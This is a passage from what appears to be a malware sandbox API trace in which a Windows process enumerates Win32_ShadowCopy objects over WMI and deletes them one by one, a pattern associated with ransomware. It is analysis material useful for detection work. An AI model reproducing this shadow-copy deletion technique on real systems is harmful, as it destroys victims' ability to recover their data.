[5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0136.858] WbemDefPath:IUnknown:Release (This=0x1b937120) returned 0x3 [0136.858] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0136.858] WbemDefPath:IUnknown:AddRef (This=0x1be53190) returned 0x4 [0136.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53190, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0136.858] WbemDefPath:IUnknown:Release (This=0x1be53190) returned 0x3 [0136.858] WbemDefPath:IUnknown:Release (This=0x1be53190) returned 0x2 [0136.858] WbemDefPath:IUnknown:Release (This=0x1be523a0) returned 0x0 [0136.858] WbemDefPath:IUnknown:Release (This=0x1be53190) returned 0x1 [0136.858] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0136.858] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0136.858] WbemDefPath:IUnknown:AddRef (This=0x1be53190) returned 0x2 [0136.859] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53190, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be53190) returned 0x0 [0136.859] WbemDefPath:IUnknown:Release (This=0x1be53190) returned 0x2 [0136.859] WbemDefPath:IUnknown:Release (This=0x1be53190) returned 0x1 [0136.859] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0136.859] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0136.859] WbemDefPath:IUnknown:AddRef (This=0x1be53190) returned 0x2 [0136.859] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53190, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be53190) returned 0x0 [0136.859] WbemDefPath:IUnknown:Release (This=0x1be53190) returned 0x2 [0136.859] WbemDefPath:IUnknown:AddRef (This=0x1be53190) returned 0x3 [0136.859] WbemDefPath:IWbemPath:SetText (This=0x1be53190, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"") returned 0x0 [0136.859] WbemDefPath:IUnknown:Release (This=0x1be53190) returned 0x2 [0136.860] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0136.860] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0136.860] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0136.860] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0136.860] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0136.860] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0136.861] IWbemClassObject:Get (in: This=0x1be59a70, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0136.861] SysStringLen (param_1="root\\cimv2") returned 0xa [0136.861] IWbemClassObject:Get (in: This=0x1be59a70, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0136.861] SysStringLen (param_1="root\\cimv2") returned 0xa [0136.861] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0136.861] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0136.861] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0136.861] IWbemClassObject:Get (in: This=0x1be59a70, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0136.861] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0136.861] IWbemClassObject:Get (in: This=0x1be59a70, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0136.861] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0136.862] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be53190, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0136.862] WbemDefPath:IWbemPath:GetText (in: This=0x1be53190, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0136.862] WbemDefPath:IWbemPath:GetText (in: This=0x1be53190, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"") returned 0x0 [0136.862] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0136.862] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0136.862] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0136.862] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0136.862] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0136.862] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0136.862] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0136.863] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0136.863] IWbemClassObject:Get (in: This=0x1be59a70, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0136.863] WbemDefPath:IWbemPath:GetText (in: This=0x1be53190, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0136.863] WbemDefPath:IWbemPath:GetText (in: This=0x1be53190, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"") returned 0x0 [0136.863] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0138.178] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0138.178] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be5a8c0, puReturned=0x1c90de18*=0x1) returned 0x0 [0138.180] IUnknown:QueryInterface (in: This=0x1be5a8c0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be5a8c0) returned 0x0 [0138.181] IUnknown:QueryInterface (in: This=0x1be5a8c0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0138.181] IUnknown:QueryInterface (in: This=0x1be5a8c0, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0138.181] IUnknown:AddRef (This=0x1be5a8c0) returned 0x3 [0138.181] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0138.181] IUnknown:QueryInterface (in: This=0x1be5a8c0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be5a8c8) returned 0x0 [0138.182] IMarshal:GetUnmarshalClass (in: This=0x1be5a8c8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0138.182] IUnknown:Release (This=0x1be5a8c8) returned 0x3 [0138.182] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0138.182] IUnknown:AddRef (This=0x1be5a8c0) returned 0x4 [0138.182] IUnknown:QueryInterface (in: This=0x1be5a8c0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0138.182] IUnknown:Release (This=0x1be5a8c0) returned 0x3 [0138.183] IUnknown:Release (This=0x1be5a8c0) returned 0x2 [0138.183] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0138.183] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0138.183] IUnknown:AddRef (This=0x1be5a8c0) returned 0x3 [0138.183] IUnknown:QueryInterface (in: This=0x1be5a8c0, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be5a8c0) returned 0x0 [0138.183] IUnknown:Release (This=0x1be5a8c0) returned 0x3 [0138.183] IUnknown:Release (This=0x1be5a8c0) returned 0x2 [0138.184] IUnknown:Release (This=0x1be5a8c0) returned 0x1 [0138.184] CoTaskMemFree (pv=0x16a900) [0138.184] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0138.184] IUnknown:AddRef (This=0x1be5a8c0) returned 0x2 [0138.184] IWbemClassObject:Get (in: This=0x1be5a8c0, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0138.185] IWbemClassObject:Get (in: This=0x1be5a8c0, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0138.185] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"") returned 0x53 [0138.185] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0138.185] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0138.185] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0138.185] IUnknown:Release (This=0x142498) returned 0x1 [0138.186] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be5a190) returned 0x0 [0138.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be5a190, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0138.186] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be5a190, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be53250) returned 0x0 [0138.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53250, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be53250) returned 0x0 [0138.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53250, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0138.187] WbemDefPath:IUnknown:AddRef (This=0x1be53250) returned 0x3 [0138.187] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0138.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53250, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b937220) returned 0x0 [0138.188] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b937220, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0138.188] WbemDefPath:IUnknown:Release (This=0x1b937220) returned 0x3 [0138.188] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0138.188] WbemDefPath:IUnknown:AddRef (This=0x1be53250) returned 0x4 [0138.189] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53250, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0138.189] WbemDefPath:IUnknown:Release (This=0x1be53250) returned 0x3 [0138.189] WbemDefPath:IUnknown:Release (This=0x1be53250) returned 0x2 [0138.190] WbemDefPath:IUnknown:Release (This=0x1be5a190) returned 0x0 [0138.190] WbemDefPath:IUnknown:Release (This=0x1be53250) returned 0x1 [0138.190] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0138.190] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0138.190] WbemDefPath:IUnknown:AddRef (This=0x1be53250) returned 0x2 [0138.191] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53250, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be53250) returned 0x0 [0138.191] WbemDefPath:IUnknown:Release (This=0x1be53250) returned 0x2 [0138.191] WbemDefPath:IUnknown:Release (This=0x1be53250) returned 0x1 [0138.192] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0138.192] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0138.192] WbemDefPath:IUnknown:AddRef (This=0x1be53250) returned 0x2 [0138.192] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53250, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be53250) returned 0x0 [0138.192] WbemDefPath:IUnknown:Release (This=0x1be53250) returned 0x2 [0138.193] WbemDefPath:IUnknown:AddRef (This=0x1be53250) returned 0x3 [0138.193] WbemDefPath:IWbemPath:SetText (This=0x1be53250, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"") returned 0x0 [0138.193] WbemDefPath:IUnknown:Release (This=0x1be53250) returned 0x2 [0138.193] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0138.193] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0138.193] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0138.193] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0138.194] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0138.194] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0138.194] IWbemClassObject:Get (in: This=0x1be5a8c0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0138.194] SysStringLen (param_1="root\\cimv2") returned 0xa [0138.194] IWbemClassObject:Get (in: This=0x1be5a8c0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0138.194] SysStringLen (param_1="root\\cimv2") returned 0xa [0138.194] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0138.194] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0138.194] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0138.194] IWbemClassObject:Get (in: This=0x1be5a8c0, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0138.195] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0138.195] IWbemClassObject:Get (in: This=0x1be5a8c0, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0138.195] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0138.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be53250, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0138.195] WbemDefPath:IWbemPath:GetText (in: This=0x1be53250, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0138.195] WbemDefPath:IWbemPath:GetText (in: This=0x1be53250, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"") returned 0x0 [0138.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, 